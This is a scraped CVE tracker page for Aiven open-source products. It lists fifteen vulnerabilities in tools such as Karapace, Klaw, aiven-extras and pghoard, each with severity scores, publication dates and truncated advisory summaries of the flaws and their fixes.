Aiven Open
Products
9- 3 CVEs
- 2 CVEs
- 2 CVEs
- 2 CVEs
- Pghoard2 CVEspypi
- 1 CVE
- 1 CVE
- 1 CVE
- 1 CVE
Recent CVEs
15| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-61673 | Hig | 0.56 | 8.6 | 0.00 | Oct 3, 2025 | Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token… | ||
| CVE-2025-31480 | Cri | 0.52 | 9.1 | 0.00 | Apr 4, 2025 | aiven-extras is a PostgreSQL extension. This is a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages the format function not being schema-prefixed. Affected users should… | ||
| CVE-2026-23529 | Hig | 0.50 | 7.7 | 0.00 | Jan 16, 2026 | Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud… | ||
| CVE-2026-45080 | Med | 0.45 | — | 0.00 | Jun 2, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, improper access control allows disclosure of password hash. This issue has been patched in version 2.10.4. | ||
| CVE-2026-39961 | Med | 0.37 | 6.8 | 0.00 | Apr 9, 2026 | Aiven Operator allows you to provision and manage Aiven Services from your Kubernetes cluster. From 0.31.0 to before 0.37.0, a developer with create permission on ClickhouseUser CRDs in their own namespace can exfiltrate secrets from any other namespace — production database… | ||
| CVE-2024-56142 | Med | 0.35 | 6.5 | 0.00 | Dec 17, 2024 | pghoard is a PostgreSQL backup daemon and restore tooling that stores backup data in cloud object stores. A vulnerability has been discovered that could allow an attacker to acquire disk access with privileges equivalent to those of pghoard, allowing for unintended path… | ||
| CVE-2026-44367 | Low | 0.18 | 2.7 | 0.00 | Jun 2, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, a vulnerability exists in the user registration and login mechanisms due to inconsistent handling of username case sensitivity, leading to a targeted Denial of Service (DoS) and… | ||
| CVE-2026-54711 | low | 0.00 | — | — | Jun 18, 2026 | ### Impact When using .pgpass, database connection information including the username and password will be logged at the debug level. ### Patches Upgrade to version 2.7.1 or greater. ### Workarounds Filter out debug-level logs. ### References This issue was discovered by… | ||
| CVE-2026-29190 | 0.00 | — | 0.00 | Mar 7, 2026 | Karapace is an open-source implementation of Kafka REST and Schema Registry. Prior to version 6.0.0, there is a Path Traversal vulnerability in the backup reader (backup/backends/v3/backend.py). If a malicious backup file is provided to Karapace, an attacker may exploit… | |||
| CVE-2026-25999 | 0.00 | — | 0.00 | Feb 11, 2026 | Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to 2.10.2, there is an improper access control vulnerability that allows unauthorized users to trigger a reset or deletion of metadata for any tenant. By sending a crafted request to the… | |||
| CVE-2025-67745 | 0.00 | — | 0.00 | Dec 18, 2025 | MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into… | |||
| CVE-2025-55283 | 0.00 | — | 0.01 | Aug 18, 2025 | aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows elevation to superuser inside PostgreSQL databases during a migration from an untrusted source server. The vulnerability stems from psql executing… | |||
| CVE-2025-55282 | 0.00 | — | 0.01 | Aug 18, 2025 | aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows a user to elevate to superuser inside PostgreSQL databases during a migration from an untrusted source server. By exploiting a lack of search_path… | |||
| CVE-2023-51390 | 0.00 | — | 0.00 | Dec 20, 2023 | journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential… | |||
| CVE-2023-32305 | 0.00 | — | 0.01 | May 12, 2023 | aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged… |
- risk 0.56cvss 8.6epss 0.00
Karapace is an open-source implementation of Kafka REST and Schema Registry. Versions 5.0.0 and 5.0.1 contain an authentication bypass vulnerability when configured to use OAuth 2.0 Bearer Token authentication. If a request is sent without an Authorization header, the token…
- risk 0.52cvss 9.1epss 0.00
aiven-extras is a PostgreSQL extension. This is a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages the format function not being schema-prefixed. Affected users should…
- risk 0.50cvss 7.7epss 0.00
Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud…
- risk 0.45cvss —epss 0.00
Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, improper access control allows disclosure of password hash. This issue has been patched in version 2.10.4.
- risk 0.37cvss 6.8epss 0.00
Aiven Operator allows you to provision and manage Aiven Services from your Kubernetes cluster. From 0.31.0 to before 0.37.0, a developer with create permission on ClickhouseUser CRDs in their own namespace can exfiltrate secrets from any other namespace — production database…
- risk 0.35cvss 6.5epss 0.00
pghoard is a PostgreSQL backup daemon and restore tooling that stores backup data in cloud object stores. A vulnerability has been discovered that could allow an attacker to acquire disk access with privileges equivalent to those of pghoard, allowing for unintended path…
- risk 0.18cvss 2.7epss 0.00
Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to version 2.10.4, a vulnerability exists in the user registration and login mechanisms due to inconsistent handling of username case sensitivity, leading to a targeted Denial of Service (DoS) and…
- risk 0.00cvss —epss —
### Impact When using .pgpass, database connection information including the username and password will be logged at the debug level. ### Patches Upgrade to version 2.7.1 or greater. ### Workarounds Filter out debug-level logs. ### References This issue was discovered by…
- CVE-2026-29190Mar 7, 2026risk 0.00cvss —epss 0.00
Karapace is an open-source implementation of Kafka REST and Schema Registry. Prior to version 6.0.0, there is a Path Traversal vulnerability in the backup reader (backup/backends/v3/backend.py). If a malicious backup file is provided to Karapace, an attacker may exploit…
- CVE-2026-25999Feb 11, 2026risk 0.00cvss —epss 0.00
Klaw is a self-service Apache Kafka Topic Management/Governance tool/portal. Prior to 2.10.2, there is an improper access control vulnerability that allows unauthorized users to trigger a reset or deletion of metadata for any tenant. By sending a crafted request to the…
- CVE-2025-67745Dec 18, 2025risk 0.00cvss —epss 0.00
MyHoard is a daemon for creating, managing and restoring MySQL backups. Starting in version 1.0.1 and prior to version 1.3.0, in some cases, myhoard logs the whole backup info, including the encryption key. Version 1.3.0 fixes the issue. As a workaround, direct logs into…
- CVE-2025-55283Aug 18, 2025risk 0.00cvss —epss 0.01
aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows elevation to superuser inside PostgreSQL databases during a migration from an untrusted source server. The vulnerability stems from psql executing…
- CVE-2025-55282Aug 18, 2025risk 0.00cvss —epss 0.01
aiven-db-migrate is an Aiven database migration tool. Prior to 1.0.7, there is a privilege escalation vulnerability that allows a user to elevate to superuser inside PostgreSQL databases during a migration from an untrusted source server. By exploiting a lack of search_path…
- CVE-2023-51390Dec 20, 2023risk 0.00cvss —epss 0.00
journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential…
- CVE-2023-32305May 12, 2023risk 0.00cvss —epss 0.01
aiven-extras is a PostgreSQL extension. Versions prior to 1.1.9 contain a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages missing schema qualifiers on privileged…